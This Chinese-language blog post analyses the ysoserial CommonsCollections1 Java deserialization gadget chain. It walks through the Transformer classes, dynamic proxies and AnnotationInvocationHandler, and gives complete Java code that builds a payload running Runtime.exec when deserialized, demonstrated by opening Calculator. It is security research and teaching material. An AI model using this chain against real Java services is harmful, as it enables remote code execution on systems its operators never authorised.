YsoSerial 工具常用Payload分析之CC1


前文介紹了最簡單的反序列化鏈URLDNS,雖然URLDNS本身不依賴第三方包且調用簡單,但不能做到漏洞利用,僅能做漏洞探測,如何才能實現RCE呢,於是就有Common-collections1-7、Common-BeanUtils等這些三方庫的利用。本文需要前置知識Java反射、動態代理等。CC1其實比較難,會用到很多高級特性,但理解了CC1后面的payload也就能輕松理解了。

背景

Common-collections是對jdk自帶的數據類型的三方增強框架,類似python里面的collections包,common-collections 目前有兩個分支,3.X和4.X,從pom文件里面可以看到兩者的groupId與artifactId都不同,擁有不同的命名空間,所以可以在一個包里面可以同時使用。

<dependency>
			<groupId>commons-collections</groupId>
			<artifactId>commons-collections</artifactId>
			<version>3.1</version>
</dependency>

<dependency>
			<groupId>org.apache.commons</groupId>
			<artifactId>commons-collections4</artifactId>
			<version>4.0</version>
</dependency>

這兩個包大部分的用法都很類似,我們先來了解包里面很重要的四大Transform。

Transformer

要學習CC鏈(我把基於common-collections利用的鏈簡稱為CC鏈),首先得了解CC鏈中用到的類及方法的基礎用法,我們需要了解CC中提供的四大Transformer。

  • InvokerTransformer
  • ConstantTransformer
  • ChainedTransformer
  • InstantiateTransformer

這一篇文章先介紹前三種,后面介紹InstantiateTransformer

InvokerTransformer

在源碼中,作者對這個類的解釋是,這個類按照Transformer接口規范以反射的方式生成一個新對象

image-20210723174023371

我們就很清楚這個類就是拿來生成新對象的,並且是通過Transformer接口定義的transform()方法生成的,可以看到Transformer接口的描述

image-20210723174047040

InvokerTransformer的實現:

public Object transform(Object input) {
        if (input == null) {
            return null;
        }
        try {
            Class cls = input.getClass();
            Method method = cls.getMethod(iMethodName, iParamTypes);
            return method.invoke(input, iArgs);
                
        } catch (NoSuchMethodException ex) {
            throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' does not exist");
        } catch (IllegalAccessException ex) {
            throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' cannot be accessed");
        } catch (InvocationTargetException ex) {
            throw new FunctorException("InvokerTransformer: The method '" + iMethodName + "' on '" + input.getClass() + "' threw an exception", ex);
        }
    }

其中的iMethodName、iParamTypes、iArgs來自於構造方法.

   public InvokerTransformer(String methodName, Class[] paramTypes, Object[] args) {
        super();
        iMethodName = methodName;
        iParamTypes = paramTypes;
        iArgs = args;
    }

InvokerTransformer.transform(Object input) ,就是以反射方式執行input對象的傳入構造方法中的method方法。

其實common-collections的萬惡之源也就是這個類,因為這個類能夠根據傳參動態生成新的對象,如果參數可控的情況下,我們可以用這個類來動態執行代碼,如:

  InvokerTransformer invokerTransformer = new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"/System/Applications/Calculator.app/Contents/MacOS/Calculator"});

  invokerTransformer.transform(Runtime.getRuntime());

執行效果:

image-20210722104543731

ConstantTransformer

ConstantTransformer 這個類功能比較簡單,就是將初始化傳入的對象變為final后執行transform返回。

image-20210722105144056

image-20210722105223495

 String test = new String("1111111");
 ConstantTransformer transformer =  new ConstantTransformer(test);
 Object obj =  transformer.transform(null);

 System.out.println(test.hashCode());
 System.out.println(obj.hashCode());

代碼執行后輸出:

image-20210722105607319

可以通俗理解初始化傳入什么transform就會返回什么。

ChainedTransformer

ChainedTransformer 理解起來可能會繞一些,初始化時傳入transforms數組.

public ChainedTransformer(Transformer[] transformers) {
        this.iTransformers = transformers;
}

執行transform方法時會遍歷初始化傳入的數組,並將上一個對象執行transforms的結果作為下一個對象執行transform的參數,以鏈式方式進行執行

public Object transform(Object object) {
        for(int i = 0; i < this.iTransformers.length; ++i) {
            object = this.iTransformers[i].transform(object);
        }
        return object;
}

在已經清楚了InvokerTransformer、ConstantTransformer的情況下我們可以用他們精心構造一個transform數組來演示Chaninedtransformer。我們構造鏈一個Transformer數組,里面的元素有預先定義好的ConstantTransformer與InvokerTransformer。

Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.getRuntime()),
                new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"/System/Applications/Calculator.app/Contents/MacOS/Calculator"})
        };
ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
chainedTransformer.transform(null);

執行chainedTransformer.transform(null)方法時,其實內部相當於是這么調用的:

  • obj1=new ConstantTransformer(Runtime.getRuntime()).transform(null)
  • obj2 = new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"/System/Applications/Calculator.app/Contents/MacOS/Calculator"}).tranform(obj1)
  • Runtime.getRuntime()).exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator")

執行效果:

image-20210722111137730

挖掘利用鏈

思路一

在前面我們其實已經簡單構造了一個惡意類了,即上面精心構造的chainedTransformer,我們只要去代碼的海洋里面找到有誰會調用chainedTransformer的transform方法就能觸發代碼執行,然后安全人員就發現了兩個方法可以對這個惡意類進一步的包裝,使其變成一個通用的數據類型,一個是TransformedMap.decorate 另一個 lazyMap.decorate, 這兩種方式都是對普通Map進行增強,使其在特定場合能夠觸發transform。也就是惡意類轉變為了Map,使其利用更加通用。

我們來看一下TransformedMap.decorate()這個方法吧,提供了三個參數 原始map、keyTransformer、valueTransformer

image-20210722145330688

跟進TransformerMap 發現其重寫了map的許多方法,有checkSetValue、put、putAll ,增強map在執行這三個方法時就會執行初始化入參的Transformer.transform()方法,假如我們傳入的就是我們構造的惡意chained Transformer ,那就成功的觸發了惡意類。不過keytransform是對key進行執行,valueTransformer是對map的value執行,但其實父類的setValue也會調用checkSetValue,所以其實是有checkSetValue、put、putAll、setValue 調用就會觸發惡意類執行。

image-20210722151434781

image-20210722154415555

這個時候這個惡意類的使用范圍就一下擴大了,畢竟很多地方都會對map進行put或者setValue的操作,那安全人員首先就找到了sun.reflect.annotation.AnnotationInvocationHandler 這個類,這是一個JDK自帶的類(rt.jar/sun/reflect/annotation/AnnotationInvocationHandler),這個類在反序列化后經過一系列騷操作最后就會調用我們上面的惡意類,分析反序列化漏洞會先從類的readObject開始,看一下AnnotationInvocationHandler 的readObject方法(jdk1.8.20),我們之前說過只要對map進行checkSetValue、put、putAll、setValue就能觸發惡意類執行,那在代碼的293行就很明顯有調用setValue方法。

image-20210722154728811

293行中的var5 其實是對象私有屬性memberValue的值,只要我們將memberValue值賦於我們的惡意類,那這個漏洞是不是就串起來了。

所以我們整理下,然后用自己的代碼來實現驗證:

第一步,基於InvokeTransformer、ConstantTransformer生成一個惡意的ChainedTransformer

public class Test {
    public static void main(String[] args) throws NoSuchMethodException, InvocationTargetException, IllegalAccessException, IOException {
        String cmd = "/System/Applications/Calculator.app/Contents/MacOS/Calculator";  //打開計算器,不同平台需要替換命令
        Transformer[] transformers =  new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",new Class[0]}),
                new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{new Object(),new Object[0]}),
                new InvokerTransformer("exec",new Class[]{String.class},new Object[]{cmd})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        // chainedTransformer.transform(1); 測試觸發
    }
}

這里可能會有人會疑問為啥這個transformers 數組會通過Runtime.class 去不斷反射執行,而不是像之前介紹InvokeTransformer時直接使用getRuntime()呢,即下面的transform1和transfom2在生成chainedTransfomer時有什么區別:

 Transformer[] transformers1 =  new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",new Class[0]}),
                new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,new Object[0]}),
                new InvokerTransformer("exec",new Class[]{String.class},new Object[]{cmd})
        };

        Transformer[] transformers2 =  new Transformer[]{
                new ConstantTransformer(Runtime.getRuntime()),
                new InvokerTransformer("exec",new Class[]{String.class},new Object[]{cmd})
        };

其實真正能夠完成反序列化代碼執行只有transformers1,為啥? 因為Java 要能完成序列化與反序列化要求這個被序列化的類有繼承Serializable,而Runtime類沒有繼承,所以直接使用transformers2 就會報錯。

第二步,使用TransformedMap.decorate() 生成一個經過transformer增強的map惡意類

這里我們使用生成一個原始的hashmap,key和value 先隨便設,這里先留個心眼,等會我們還要回頭看,TransformedMap 調用setValue實際上是調用了valueTransformer,所以應該將transfomer給到第三個參數。

image-20210722163751377

第二步代碼如下

//        第二步
        HashMap<String,String> hashMap = new HashMap<>();
        hashMap.put("testKey","testVal");  // 這個地方留坑
        Map evilMap = TransformedMap.decorate(hashMap,null,chainedTransformer);
//        Map.Entry entry = (Map.Entry) evilMap.entrySet().iterator().next();
//        entry.setValue("1");    測試觸發

第三步,給AnnotationInvocationHandler私有變量memberValues 賦值惡意對象

AnnotationInvocationHandler 的構造函數沒有用public修飾,沒法直接通過new 的方式生成對象,所以我們要通過萬能的反射獲取構造方法,然后執行newInstance的方式來生成AnnotationInvocationHandler對象。其中構造方法第一個參數要求為Annotaion的子類,我們這里傳入@Target,第二個參數即為我們想要賦值的變量memberValues。

image-20210722165059364

代碼:

//       第三步
        Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor constructor =  clazz.getDeclaredConstructor(Class.class,Map.class);  // 通過反射獲取構造器
        constructor.setAccessible(true);  // 設置可以訪問
        InvocationHandler evilHandler = (InvocationHandler) constructor.newInstance(Target.class, evilMap);  // 傳入@target和惡意map

第四步 反序列化觸發

//        第四步 
        String path = ExpUtils.serialize(evilHandler);  // 使用自己封裝的序列化函數返回序列化文件的路徑
        ExpUtils.unserialize(path);  // 反序列指定文件

執行這所有步驟的代碼,但並沒有按照我們預期的執行命令然后彈出計算器。

image-20210722171316772

打上斷點進行調試看一看

image-20210722171855748

原來在執行setvalue前有一個if分支,要求var7不為null,而這個var7 是AnnotationInvocationHandler構造傳參的第一個注解參數獲取我們惡意map的key的返回值,所以要是var7不為null,惡意map的key為一個有意義的值,那應該是啥呢,打開var3變量可以看到只要將key設置為value var7即可不為null。

image-20210722172534475

所以修改第二步hashMap中key為value,重新運行代碼

image-20210722172646854

成功執行,沒毛病~

目前這個利用方式害只能在較低的jdk版本運行,1.8.71 以下,高版本移除了對memberValue的setValue方法

image-20210722173049030

其實這個思路和yso中cc1的利用鏈還不同,也就是這其實不是CC1 ,只是另外一種方式的利用方法,那真正的CC1是怎么利用的呢? 請看思路二

思路二

思路一是通過readObject中的存在觸發函數而利用的,而思路二則是回歸AnnotationInvocationHandler 這個類本身,AnnotationInvocationHandler 實現了InvocationHandler,而InvocationHandler 是作為jdk動態代理使用的,通過調用InvocationHandler中的invoke方法來對被代理對象進行增強。

這里展開下動態代理吧

JDK動態代理

其實代理分為靜態代理與動態代理,靜態代理即手動的創建一個代理類,在代理類中調用原本的類,外界通過手動掉用代理的方式實現類被代理的效果,靜態的方式有明顯的缺點,如我想為某一個類增加一個埋點上報的功能,這個時候用靜態代理沒有問題,但我還有若干個類也想埋點上報這就需要我編寫若干個代理類,不方便實際使用,所以動態代理就出來了,動態代理可以通過編寫一個AnnotationInvocationHandler的實現類就可以為每一個想要增強的類實現類似的功能,非常靈活也減少了工作量。

動態代理有很多種實現,總的分為:

  • 預編譯方式 主要有AspectJ
  • 運行期動態代理 代表的有 JDK動態代理、CGLib動態代理,JDK動態代理只能代理實現了借口的類

動態代理也是Spring核心技術AOP的重要實現方式,下面用一個實例演示JDK動態代理的使用。

項目中存在

image-20210722192146495

Animal接口,定義了動物能干的事:

package ProxyDemo;

public interface Animal {
    public void eat();
}

CatImpl 實現了Animal接口

package ProxyDemo;

public class CatImpl implements Animal{
    @Override
    public void eat() {
        System.out.println("miao~");
    }
}

AnimalHandler 實現了InvocationHandler接口,重寫后的大概邏輯就是在原對象運行的前后分別輸出pre和after,注意點是原對象每次執行任意原方法如這里的eat都會調用handler中的invoke方法。

package ProxyDemo;

import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Method;

public class AnimalHandler implements InvocationHandler {

    private final Object obj0;

    public AnimalHandler(Object obj0){
        this.obj0 = obj0;
    }

    @Override
    public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {
        System.out.println("pre");
        Object res = method.invoke(obj0,args);
        System.out.println("after");
        return res;
    }
}

TestMain 中完成調用具體邏輯, 調用Proxy的靜態方法newProxyInstance,分別傳入classloader、原類接口、handler

package ProxyDemo;

import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;

public class TestMain {
    public static void main(String[] args) {
        InvocationHandler handler = new AnimalHandler(new CatImpl());
        Animal cat = (Animal) Proxy.newProxyInstance(TestMain.class.getClassLoader(),CatImpl.class.getInterfaces(),handler);
        cat.eat();
    }
}

執型TestMain的main方法,結果:

image-20210722193306517

明顯已經在原來輸出miao~的前后加上了pre與after完成了增強,其實個人感覺這里特別像python的裝飾器。

介紹完JDK動態代理后我們回過頭來看AnnotationInvocationHandler 這個類,我們發現它就是對InvocationHandler 的實現,具體Invoke邏輯如下:

image-20210722193836152

在53行代碼中有對memberValue做get操作,回顧之前TransformedMap增強對hashmap會在setValue時候觸發惡意類,那有沒有可以通過執行get方法觸發惡意類的方式呢? 答案是肯定的,就是通過開頭我們提到的LazyMap.decorate ,Lazymap的大致功能根據字面意思也可以知道,就是提供懶加載的功能,具體到執行get方法是,先去判斷map中是否存在這個key 如果沒有就調用 LazyMap.decorate 初始化傳入到transformer對象的transfrom方法,進而出發惡意transform。

image-20210722194541979

那思路其實就清晰了,反序列化過程中想辦法調用AnnotationInvocationHandler 的invoke方法即可觸發惡意類執行,那怎么調用invoke方法呢,因為AnnotationInvocationHandler本身就實現了invoke方法,所以我們直接用它作為動態代理的handler,只要原對象有執行任意方法即可調用invoker完成惡意類執行。這次甚至都不用管var7是否為null了,因為memberValues在其之前有執行entrySet方法,進而調用invoke,調用memberValues.get()方法觸發惡意類。

image-20210722195035709

執行流程:

  1. AnnotationInvocationHandler.readObject()
  2. this.memberValues.entrySet()
  3. AnnotationInvocationHandler.invoke()
  4. this.memberValues.get()
  5. Lazy map.get()
  6. ChainedTransformed.transform()
  7. Runtime.getRuntime().exec(cmd)

那我們用自己的代碼來實現以下:

第一步 生成LazyMap增強后的map,chainedTransform生成和思路一一樣

//        chainedTransformer 和思路一生成方式一致
        String cmd = "/System/Applications/Calculator.app/Contents/MacOS/Calculator";
        Transformer[] transformers =  new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",new Class[0]}),
                new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,new Object[0]}),
                new InvokerTransformer("exec",new Class[]{String.class},new Object[]{cmd})
        };

        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        HashMap<String,String> hashMap = new HashMap<>();
        hashMap.put("testKey","testVal");
        Map evilMap = LazyMap.decorate(hashMap,chainedTransformer);  //  使用lazyMap增強

第二步 生成AnnotationInvocationHandler 對象

同思路一一致,通過反射獲取構造函數的方式生成AnnotationInvocationHandler對象

		Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor constructor =  clazz.getDeclaredConstructor(Class.class,Map.class);  // 反射獲取構造函數
        constructor.setAccessible(true);
        InvocationHandler evilHandler = (InvocationHandler) constructor.newInstance(Target.class, evilMap);  // 執行構造函數生成對象,傳入lazyMap

第三步 通過動態代理使用第二步AnnotationInvocationHandler的代理lazyMap,並將其作為構造方法參數賦值給memberValues

  Map evilLazyMap = (Map) Proxy.newProxyInstance(Test2.class.getClassLoader(),evilMap.getClass().getInterfaces(),evilHandler);
  InvocationHandler finalEvilHandler = (InvocationHandler) constructor.newInstance(Target.class, evilLazyMap);  // 傳入代理lazyMap

第四步 序列化反序列化觸發

        String path =  ExpUtils.serialize(finalEvilHandler);
        ExpUtils.unserialize(path);

完美觸發,沒毛病~

image-20210722201030261

思路二就是CC1鏈的主要邏輯,但CC1在8u71后不能使用,我們對比下新老版本,分析一下原因

image-20210722201339686

左邊為新版本右邊為舊版本,可以看到在新版jdk中,反序列化不再通過defaultReadObject方式,而是通過readFields 來獲取幾個特定的屬性,這兩種方式有什么區別呢,經過我自己多次調試發現defaultReadObject 可以恢復對象本身的類屬性,比如this.memberValues 就能恢復成我們原本設置的惡意類,但通過readFields方式,this.memberValues 就為null,所以后續執行get()就必然沒發觸發,這也就是高版本不能使用的原因,網上大多會說是因為取消了SetValue導致不能觸發,但其實不然,思路一確實是因為這個原因,但CC1和取消setValue沒有半毛錢關系。

總結

經過洋洋灑灑4000多字分析了AnnotationInvocationHandler的兩種思路上的利用方式,其中YSO工具中CC1鏈就是本文中的思路二,CC1 用到了很多高級特性,理解上可能會比較困難,但只要搞懂了后續的鏈也就很輕松了,目前CC1還只能在低於8u71的版本利用或者比修復這個漏洞前的版本,那如果對方機器是高版本且為Common-collections4 呢,后續的CC2 就來看看Common-collections4下的利用。

p神代碼審計知識星球
https://xz.aliyun.com/t/7031#toc-2

公眾號

歡迎關注我的公眾號!


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM